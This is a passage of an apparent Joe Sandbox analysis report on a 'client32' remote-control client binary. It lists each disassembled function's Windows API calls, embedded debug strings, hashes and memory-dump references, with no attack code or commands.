                                                                                • String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
                                                                                • API String ID: 510078033-311296318
                                                                                • Opcode ID: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                • Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
                                                                                • Opcode Fuzzy Hash: 628bd5edbdc2b934cdea530cf6e87229bc90534bd2c32232888589127f272096
                                                                                • Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51
                                                                                APIs
                                                                                • GetOverlappedResult.KERNEL32(?,1B702737,FFFFFFFF,00000001), ref: 1100B8BC
                                                                                • GetLastError.KERNEL32 ref: 1100B8C6
                                                                                • GetTickCount.KERNEL32 ref: 1100B929
                                                                                • wsprintfA.USER32 ref: 1100B966
                                                                                • ResetEvent.KERNEL32(?), ref: 1100BA1F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                • API String ID: 3598861413-432254317
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
                                                                                • API String ID: 536389180-1339850372
                                                                                APIs
                                                                                Strings
                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110773D
                                                                                • SetTSModeClientName(%d, %s) ret %d, xrefs: 111077FF
                                                                                • Warning. simap lock held for %d ms, xrefs: 11107825
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$CriticalSection$EnterLeave_strncpy
                                                                                • String ID: SetTSModeClientName(%d, %s) ret %d$Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                • API String ID: 3891031082-3311166593
                                                                                APIs
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
                                                                                • std::exception::exception.LIBCMT ref: 110DD7B8
                                                                                • __CxxThrowException@8.LIBCMT ref: 110DD7D3
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875
                                                                                  • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                  • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,1B702977,?,00000000,00000001), ref: 110D7F8C
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                Strings
                                                                                • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                • API String ID: 477284662-4139260718
                                                                                APIs
                                                                                • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                • SendMessageA.USER32(00000000,0000004A,00040310,?), ref: 1103D313
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                • String ID: CLTCONN.CPP$NSMW16Class
                                                                                • API String ID: 4104200039-3790257117
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 490496107-2775872530
                                                                                APIs
                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                                • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                • API String ID: 2388757878-1455766584
                                                                                • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                                • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                                APIs
                                                                                • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                • ShowWindow.USER32(00000000), ref: 11023524
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 3823882759-1986719024
                                                                                • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                APIs
                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                • LoadLibraryA.KERNEL32(secur32.dll,1B702977,?,?,?), ref: 111470D1
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                • API String ID: 2282859717-3523682560
                                                                                • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                APIs
                                                                                • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                • SelectObject.GDI32(?,?), ref: 11037872
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                • String ID:
                                                                                • API String ID: 649858571-0
                                                                                • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                APIs
                                                                                • SetFocus.USER32(?), ref: 110254CE
                                                                                • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                • ShowCaret.USER32(00000000), ref: 11025515
                                                                                • DestroyCaret.USER32 ref: 11025529
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Caret$CreateDestroyFocusItemShow
                                                                                • String ID:
                                                                                • API String ID: 3189774202-0
                                                                                • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11019370
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
• _memmove.LIBCMT ref: 110193F7
• _memmove.LIBCMT ref: 1101941B
• _memmove.LIBCMT ref: 11019455
• _memmove.LIBCMT ref: 11019471
• std::exception::exception.LIBCMT ref: 110194BB
• __CxxThrowException@8.LIBCMT ref: 110194D0
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
• String ID: deque<T> too long
• API String ID: 827257264-309773918
APIs
  • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
• GetWindowRect.USER32(?,?), ref: 111194E1
• MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
• GetClientRect.USER32(?,?), ref: 11119508
• GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
• GetSystemMetrics.USER32(00000003), ref: 11119559
• GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
• GetSystemMetrics.USER32(00000002), ref: 11119576
Strings
• GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
• String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
• API String ID: 4172599486-2052393828
APIs
  • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
  • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
  • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
• wsprintfA.USER32 ref: 1100977F
• wsprintfA.USER32 ref: 11009799
